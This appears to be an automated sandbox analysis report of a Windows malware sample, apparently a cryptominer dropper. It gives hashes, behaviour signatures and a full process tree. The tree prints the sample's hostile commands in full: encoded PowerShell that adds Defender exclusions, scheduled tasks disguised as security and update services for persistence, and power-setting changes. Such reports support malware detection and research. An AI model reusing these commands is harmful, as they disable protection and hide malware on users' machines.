88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b

Analysis

max time kernel
302s
max time network
183s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
17/09/2022, 10:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe
Size

700.1MB
MD5

5df6dd5953cd4ff65cc066dafce9db94
SHA1

96cfc22955e799d549eed49b0e75c831a94aa0b5
SHA256

88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b
SHA512

aff0245db03cb1ef0fe144e9ddc8de3e40da1aef29a00781c7d2953bac0788290d13ff84577fa5fff5e5b30e61a64e6ff89860b603ef66bf178e86b2f0efbff8
SSDEEP

3072:VqpI0I49ITHHGZJUTlL6aZambk2fY9etSkS:VqpzZJUBL6SambVfY9etSk

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe

Executes dropped EXE 2 IoCs

pid	Process
3488	dllhost.exe
3472	dllhost.exe

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4456	schtasks.exe
1848	schtasks.exe
1476	schtasks.exe
1416	schtasks.exe
1240	schtasks.exe
4936	schtasks.exe
4648	schtasks.exe
372	schtasks.exe
96	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe
1400	powershell.exe
1400	powershell.exe
1400	powershell.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
1468	powershell.exe
916	powershell.exe
3488	dllhost.exe
4612	powershell.exe
432	powershell.exe
3488	dllhost.exe
1672	powershell.exe
3488	dllhost.exe
3488	dllhost.exe
1468	powershell.exe
3488	dllhost.exe
4612	powershell.exe
916	powershell.exe
3488	dllhost.exe
1672	powershell.exe
432	powershell.exe
3488	dllhost.exe
3488	dllhost.exe
4612	powershell.exe
3488	dllhost.exe
1468	powershell.exe
3488	dllhost.exe
916	powershell.exe
1672	powershell.exe
3488	dllhost.exe
3488	dllhost.exe
432	powershell.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe
3488	dllhost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	3488	dllhost.exe
Token: SeShutdownPrivilege	2176	powercfg.exe
Token: SeCreatePagefilePrivilege	2176	powercfg.exe
Token: SeShutdownPrivilege	1940	powercfg.exe
Token: SeCreatePagefilePrivilege	1940	powercfg.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeShutdownPrivilege	3608	powercfg.exe
Token: SeCreatePagefilePrivilege	3608	powercfg.exe
Token: SeShutdownPrivilege	4668	powercfg.exe
Token: SeCreatePagefilePrivilege	4668	powercfg.exe
Token: SeShutdownPrivilege	2432	powercfg.exe
Token: SeCreatePagefilePrivilege	2432	powercfg.exe
Token: SeShutdownPrivilege	2432	powercfg.exe
Token: SeCreatePagefilePrivilege	2432	powercfg.exe
Token: SeDebugPrivilege	3472	dllhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2656 wrote to memory of 4180	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	67
PID 2656 wrote to memory of 4180	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	67
PID 2656 wrote to memory of 4180	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	67
PID 4180 wrote to memory of 1400	4180	cmd.exe	69
PID 4180 wrote to memory of 1400	4180	cmd.exe	69
PID 4180 wrote to memory of 1400	4180	cmd.exe	69
PID 2656 wrote to memory of 3488	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	70
PID 2656 wrote to memory of 3488	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	70
PID 2656 wrote to memory of 3488	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	70
PID 2656 wrote to memory of 4700	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	71
PID 2656 wrote to memory of 4700	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	71
PID 2656 wrote to memory of 4700	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	71
PID 2656 wrote to memory of 4704	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	72
PID 2656 wrote to memory of 4704	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	72
PID 2656 wrote to memory of 4704	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	72
PID 2656 wrote to memory of 3896	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	73
PID 2656 wrote to memory of 3896	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	73
PID 2656 wrote to memory of 3896	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	73
PID 2656 wrote to memory of 4728	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	74
PID 2656 wrote to memory of 4728	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	74
PID 2656 wrote to memory of 4728	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	74
PID 2656 wrote to memory of 3264	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	75
PID 2656 wrote to memory of 3264	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	75
PID 2656 wrote to memory of 3264	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	75
PID 2656 wrote to memory of 4664	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	76
PID 2656 wrote to memory of 4664	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	76
PID 2656 wrote to memory of 4664	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	76
PID 2656 wrote to memory of 4760	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	112
PID 2656 wrote to memory of 4760	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	112
PID 2656 wrote to memory of 4760	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	112
PID 2656 wrote to memory of 4088	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	111
PID 2656 wrote to memory of 4088	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	111
PID 2656 wrote to memory of 4088	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	111
PID 2656 wrote to memory of 1280	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	78
PID 2656 wrote to memory of 1280	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	78
PID 2656 wrote to memory of 1280	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	78
PID 2656 wrote to memory of 3928	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	79
PID 2656 wrote to memory of 3928	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	79
PID 2656 wrote to memory of 3928	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	79
PID 2656 wrote to memory of 3908	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	80
PID 2656 wrote to memory of 3908	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	80
PID 2656 wrote to memory of 3908	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	80
PID 2656 wrote to memory of 4852	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	81
PID 2656 wrote to memory of 4852	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	81
PID 2656 wrote to memory of 4852	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	81
PID 2656 wrote to memory of 4780	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	82
PID 2656 wrote to memory of 4780	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	82
PID 2656 wrote to memory of 4780	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	82
PID 2656 wrote to memory of 4768	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	84
PID 2656 wrote to memory of 4768	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	84
PID 2656 wrote to memory of 4768	2656	88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe	84
PID 4700 wrote to memory of 4456	4700	cmd.exe	94
PID 4700 wrote to memory of 4456	4700	cmd.exe	94
PID 4700 wrote to memory of 4456	4700	cmd.exe	94
PID 4704 wrote to memory of 1848	4704	cmd.exe	95
PID 4704 wrote to memory of 1848	4704	cmd.exe	95
PID 4704 wrote to memory of 1848	4704	cmd.exe	95
PID 4760 wrote to memory of 4648	4760	cmd.exe	97
PID 4760 wrote to memory of 4648	4760	cmd.exe	97
PID 4760 wrote to memory of 4648	4760	cmd.exe	97
PID 1280 wrote to memory of 1672	1280	cmd.exe	99
PID 1280 wrote to memory of 1672	1280	cmd.exe	99
PID 1280 wrote to memory of 1672	1280	cmd.exe	99
PID 4728 wrote to memory of 372	4728	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe
"C:\Users\Admin\AppData\Local\Temp\88e8506c4c7271b914df1ec25ed039ae46112f810f9cf9ae11e0e38aeed7345b.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAFgANgBBADEASAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEAdgBnAEYAMwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEcAQQBMAFoAaABHADMATgBIAFMAdAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBYAG0AawBqADgAdQBTAGoAIwA+AA=="
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAFgANgBBADEASAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEAdgBnAEYAMwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEcAQQBMAFoAaABHADMATgBIAFMAdAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBYAG0AawBqADgAdQBTAGoAIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- C:\ProgramData\Dllhost\dllhost.exe
  "C:\ProgramData\Dllhost\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4232
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:3140
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:2320
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:232
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:524
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4636
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:2540
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo ZШЫaяРтKЩ & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЖюДhглvCКxзAyqYНb
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4456
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo CkrpщZtсХЪ3 & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo w0КД1юОuлнЗtb
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4704
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo ДyаьыОПthьтГwцДФЩQЕ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo a
  2⤵
  PID:3896
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1240
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo 3Jм & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ОФЖчHБnзйМkmD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:372
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo ШdSgxпщXGГь & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo VЖБЦЦPcЧЮ
  2⤵
  PID:3264
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo U5бс
  2⤵
  PID:4664
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:96
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAPwRiABwEVABEACEEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA5ADMAbgBaAE8EcABGBGUASAAZBGMAPgQoBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA6BHgAKQQoBD4EcwB0AHAASwBtABwEIwA+ACAAQAAoACAAPAAjADYANwQ3BB0EJAQ6BHEAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGkAUABPBEUEFARRADIAFAQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASARhAFYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBtABcEcgBJBEQEEwRHBFUAdAAjAD4A"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHMAPwRiABwEVABEACEEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA5ADMAbgBaAE8EcABGBGUASAAZBGMAPgQoBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwA6BHgAKQQoBD4EcwB0AHAASwBtABwEIwA+ACAAQAAoACAAPAAjADYANwQ3BB0EJAQ6BHEAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGkAUABPBEUEFARRADIAFAQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASARhAFYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBtABcEcgBJBEQEEwRHBFUAdAAjAD4A"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjADQASgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAC8ENgA3ABQEOQRGBFQAMAR5AEYERQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMATQA4BEUAYQBOBG0ASgQpBC4ENgBOBDsESgAtBCMAPgAgAEAAKAAgADwAIwAmBDwEdwBNBHAAPwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAOQQ0ADsEPgRGBBAEQgArBBQETgAbBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBLAGwANABUAFoAFAQQBDcANgQ3AEIEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAPwRFBHYASwQUBGMAKgRvAEgAQARCABMEVAAjAD4A"
  2⤵
  PID:3928
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjADQASgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAC8ENgA3ABQEOQRGBFQAMAR5AEYERQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMATQA4BEUAYQBOBG0ASgQpBC4ENgBOBDsESgAtBCMAPgAgAEAAKAAgADwAIwAmBDwEdwBNBHAAPwQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAOQQ0ADsEPgRGBBAEQgArBBQETgAbBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBLAGwANABUAFoAFAQQBDcANgQ3AEIEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAPwRFBHYASwQUBGMAKgRvAEgAQARCABMEVAAjAD4A"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1468
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAEQEOAREBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMASAQxABkEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEAERQBOAFEAIwQmBEcAdABiAGQAIwA+ACAAQAAoACAAPAAjACkEYgAvBDwEPwQnBB4EOAAVBFgANgQQBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAuBE4ATwB0AB8EOgQWBEsAagBhACcEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEoARQRGAGoAKwRuADAEeQBpADMEawA2BGEAIgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2BCEEGARDACMAPgA="
  2⤵
  PID:3908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAEQEOAREBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMASAQxABkEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEAERQBOAFEAIwQmBEcAdABiAGQAIwA+ACAAQAAoACAAPAAjACkEYgAvBDwEPwQnBB4EOAAVBFgANgQQBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAuBE4ATwB0AB8EOgQWBEsAagBhACcEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAEoARQRGAGoAKwRuADAEeQBpADMEawA2BGEAIgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA2BCEEGARDACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:432
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAFUANgRSADQAMwBtAEoAOQRuADMATgRiABEEGgRSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAPgRaAC0ESwBmAE8ESgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQwA2BHMAFARPAEcAUgBuACMAPgAgAEAAKAAgADwAIwAiBEkEMARDABMEPgQmBCUEcABrAD8EKAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATQREAD8EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGMAPQRlACcELQRHBGoAHgRDABoEIQRWAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBABEQAYgBCAEwEcgAqBBoEdgA1AC0ESwQjAD4A"
  2⤵
  PID:4852
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAFUANgRSADQAMwBtAEoAOQRuADMATgRiABEEGgRSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAPgRaAC0ESwBmAE8ESgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAQwA2BHMAFARPAEcAUgBuACMAPgAgAEAAKAAgADwAIwAiBEkEMARDABMEPgQmBCUEcABrAD8EKAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATQREAD8EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGMAPQRlACcELQRHBGoAHgRDABoEIQRWAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBABEQAYgBCAEwEcgAqBBoEdgA1AC0ESwQjAD4A"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4612
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjADsEdAARBBYESgA5BEUAKARqACoEZwAQBDMEUQBFBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKAQ1ACEERAA1BHcAKgQ2BGIAGwRHBHcAIwQQBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAuBGwAbwBGAGkAFQRlAGwAIwA+ACAAQAAoACAAPAAjADIESwBIBFgAGARTAHgAKARHABQEVQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMALARUACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA2AE8AUAAUBFYAKARoAGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVABnABoEMQAjAD4A"
  2⤵
  PID:4780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjADsEdAARBBYESgA5BEUAKARqACoEZwAQBDMEUQBFBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKAQ1ACEERAA1BHcAKgQ2BGIAGwRHBHcAIwQQBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAuBGwAbwBGAGkAFQRlAGwAIwA+ACAAQAAoACAAPAAjADIESwBIBFgAGARTAHgAKARHABQEVQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMALARUACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA2AE8AUAAUBFYAKARoAGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVABnABoEMQAjAD4A"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo у & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo У
  2⤵
  PID:4768
